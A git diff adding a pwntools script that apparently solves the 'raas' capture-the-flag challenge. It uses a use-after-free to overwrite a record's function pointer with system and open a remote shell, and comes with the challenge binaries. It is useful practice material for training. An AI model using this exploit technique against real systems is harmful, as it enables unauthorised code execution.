diff --git a/UAF/raas/answer.py b/UAF/raas/answer.py
new file mode 100644
index 0000000..a3836a5
--- /dev/null
+++ b/UAF/raas/answer.py
@@ -0,0 +1,48 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64, math, time
+context(arch = "i386",os = "linux", log_level = "debug")
+
+def record_new(p, index, rec_type, str_length, value):
+    p.recvuntil("Act > ")
+    p.sendline("1")
+    p.recvuntil("Index > ")
+    p.sendline(index)
+    p.recvuntil("Type > ")
+    p.sendline(rec_type)
+    if rec_type == "2":
+        p.recvuntil("Length > ")
+        p.sendline(str_length)
+    p.recvuntil("Value > ")
+    p.sendline(value)
+
+def record_del(p, index):
+    p.recvuntil("Act > ")
+    p.sendline("2")
+    p.recvuntil("Index > ")
+    p.sendline(index)
+
+p = remote("hackme.inndy.tw", 7719)
+# p = process('./raas.patched')
+elf = ELF('./raas.patched')
+gdb_command =   """
+                b *0x80487a3
+                b *0x8048880
+                b *0x804893a
+                """
+# two malloc in do_new, call eax in do_del
+time.sleep(1)
+# gdb.attach(p, gdb_command)
+
+system_plt = elf.plt['system']
+
+record_new(p, "0", "1", None, "0")
+record_new(p, "1", "1", None, "0")
+record_del(p, "1")
+record_del(p, "0")
+record_new(p, "2", "2", "12" , "sh\x00\x00" + p32(system_plt))
+record_del(p, "1")
+
+p.interactive()
\ No newline at end of file
diff --git a/UAF/raas/raas b/UAF/raas/raas
new file mode 100755
index 0000000..05ac596
Binary files /dev/null and b/UAF/raas/raas differ
diff --git a/UAF/raas/raas.idb b/UAF/raas/raas.idb
new file mode 100644
index 0000000..fa6ce21
Binary files /dev/null and b/UAF/raas/raas.idb differ
diff --git a/UAF/raas/raas.patched b/UAF/raas/raas.patched
new file mode 100755
index 0000000..740710e
Binary files /dev/null and b/UAF/raas/raas.patched differ